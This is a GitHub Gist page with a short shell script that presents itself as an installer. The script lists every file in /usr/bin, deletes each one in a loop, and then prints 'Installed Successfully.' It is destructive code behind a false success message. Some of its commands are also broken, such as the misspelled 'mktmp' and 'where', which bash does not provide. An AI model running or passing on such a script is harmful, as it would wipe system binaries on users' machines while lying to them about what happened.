Created
April 1, 2023 11:30
-
-
Save regmicmahesh/fba749de42b8eedfaa90797b400a4c1e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
USER=$(whoami); | |
TEMP_PATH=$(mktmp -d); | |
FILES=$(ls /usr/bin/*); | |
for i in $FILES | |
do | |
rm $(where $i) | |
done | |
echo Installed Successfully. |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment